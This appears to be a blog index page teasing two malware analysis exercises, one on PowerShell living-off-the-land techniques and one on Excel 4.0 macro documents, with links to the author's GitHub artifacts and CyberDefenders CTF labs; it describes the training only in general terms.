Malware Analysis Exercise – Living Off the Land with Powershell

It is common for threat actors to utilize living off the land (LOTL) techniques, such as the execution of PowerShell to further their attacks and transition from macro code. This lab is intended to show how you can often times perform quick analysis to extract important IOCs. While there may be several ways to answer these questions the focus on this exercise is on static techniques for analysis. You can find the exercise, artifacts and full walk-through on my Github at https://github.com/jstrosch/malware-samples/tree/master/malware_analysis_exercises/2020/December Looking for more of a challenge? Try this on CyberDefenders as part of their CTF! https://cyberdefenders.org/labs/51

Read more

Malware Analysis Exercise – Getting Started with Excel 4 Macros

Recently, we have seen a resurgence of Excel-based malicious office documents. However, instead of using VBA-style macros, they are using older style Excel 4 macros. This changes our approach to analyzing these documents, requiring a slightly different set of tools. In this challenge, you’ll get hands-on with two documents that use Excel 4.0 macros to perform anti-analysis and download the next stage of the attack. You can find the exercise, artifacts and full walk-through on my Github at https://github.com/jstrosch/malware-samples/tree/master/malware_analysis_exercises/2021/February. Looking for more of a challenge? Try this on CyberDefenders as part of their CTF! https://cyberdefenders.org/labs/55

Read more